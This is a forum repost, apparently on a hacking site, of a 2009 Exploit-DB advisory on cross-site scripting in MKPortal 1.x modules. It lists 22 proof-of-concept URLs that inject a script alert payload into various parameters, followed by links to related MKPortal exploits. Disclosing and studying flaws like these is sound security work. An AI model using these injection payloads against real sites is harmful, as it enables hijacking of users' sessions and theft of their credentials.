Exploit MKPortal 1.x (Multiple Modules) - Cross-Site Scripting

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
33206
Проверка EDB
  1. Пройдено
Автор
INJ3CT0R
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2009-08-31
Код: 
source: https://www.securityfocus.com/bid/36216/info

Multiple modules of MKPortal are prone to cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible. 

http://www.example.com/index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/index.php?ind=whois&blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/index.php?ind=lenta&output=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/index.php?ind=lenta&blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/metric/?output=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/metric/?error=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/metric/?blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/index.php?ind=recommend&blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/Anekdot/?output=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/Anekdot/?blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/Anekdot/?contents=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/contact/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/contact/[email protected]&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&[email protected]&output=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/contact/[email protected]&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&[email protected]&blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/speed/?output=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/speed/?blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/index.php?ind=horoscop&blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/index.php?ind=horoscop&output=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/catphones/index.php?output=%3Cscript%3Ealert(1)%3C/script%3E
http://www.example.com/catphones/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit MKPortal 1.x - Multiple BBCode HTML Injection Vulnerabilities
Ответы
0
Просмотры
375
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit MKPortal 1.1 - Multiple Input Validation Vulnerabilities
Ответы
0
Просмотры
351
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit MKPortal 1.2.1 - Multiple Vulnerabilities
Ответы
0
Просмотры
306
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit MKPortal 1.0/1.1 - 'PMPopup.php' Cross-Site Scripting
Ответы
0
Просмотры
352
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit MKPortal 1.0.1 - 'index.php' Directory Traversal
Ответы
0
Просмотры
353
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit MKPortal 1.2.1 - '/modules/rss/handler_image.php?i' Cross-Site Scripting
Ответы
0
Просмотры
347
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit MKPortal 1.2.1 - '/modules/blog/index.php' Home Template Textarea SQL Injection
Ответы
0
Просмотры
349
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit MKPortal 1.1 Gallery Module - SQL Injection
Ответы
0
Просмотры
343
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit MKPortal 1.0/1.1 - 'admin.php' Authentication Bypass
Ответы
0
Просмотры
328
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit MKPortal 1.1.1 reviews / Gallery modules - SQL Injection
Ответы
0
Просмотры
273
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу